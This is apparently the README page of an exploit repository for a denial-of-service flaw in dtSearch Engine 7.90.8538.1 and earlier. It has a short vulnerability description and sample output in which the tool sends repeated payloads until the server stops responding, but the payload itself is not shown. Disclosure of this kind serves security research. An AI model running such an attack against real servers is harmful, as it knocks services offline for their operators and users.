Skip to content

Latest commit

 

History

History
25 lines (20 loc) · 905 Bytes

File metadata and controls

25 lines (20 loc) · 905 Bytes

dtSearch Engine <= v7.90.8538.1 Denial of Service

Description

A stack exhaustion vulnerability in the search function of dtSearch Corp. dtSearch Engine 7.90.8538.1 and prior allows remote attackers to cause a denial of service condition by sending a specially crafted HTTP request.

Example output

[+] Retrieving form from http://localhost/dtSearch.html

[+] Variables:
* Url: "http://localhost/dtSearch/dtisapi6.dll"
* Keyword: "server"
* Index: "*{aa7eb69bcc7362bf3b92a8b29ae568ff} documents"
* OrigSearchForm: "/dtSearch.html"

[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Succes! Connection reset.
[+] Sending DoS payload... Failed. Server down?

Screenshot

Evidence